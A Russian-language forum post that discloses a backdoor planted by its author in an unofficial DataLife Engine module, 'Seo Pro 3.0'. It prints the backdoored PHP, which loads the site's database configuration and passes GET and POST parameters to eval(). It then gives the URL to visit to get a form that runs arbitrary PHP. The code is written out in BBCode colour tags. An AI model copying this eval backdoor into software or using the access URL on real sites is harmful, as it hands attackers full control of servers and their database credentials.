31.12.2011, 17:34
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
Провел на форуме:
29020
Репутация:
55
|
|
Неофициальный модуль Seo Pro 3.0
Описание:выполнение произвольного кода (бекдор от автора)
Файл: /engine/ajax/seo_info.php
Уязвимый код:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
}else{
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/engine/classes/mysql.class.php"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])){ @require([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"mysql.class.php - ok
"[/COLOR][COLOR="#007700"];}
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/engine/data/dbconfig.php"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])){ @require([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"dbconfig.php - ok
"[/COLOR][COLOR="#007700"];}
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/engine/data/config.php"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])){ @require([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"config.php - ok
"[/COLOR][COLOR="#007700"];}
eval([/COLOR][COLOR="#0000BB"]base64_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]]));
echo
[/COLOR][COLOR="#007700"]HTML;
if([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'text'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]){eval([/COLOR][COLOR="#0000BB"]stripcslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'text'[/COLOR][COLOR="#007700"]]));
...
[/COLOR][/COLOR]
Для использования достаточно зайти на
Код:
http://127.0.0.1/dle/engine/ajax/seo_info.php?wert=evil
после чего должна появиться форма способная выполнять ваш php код
|
|
|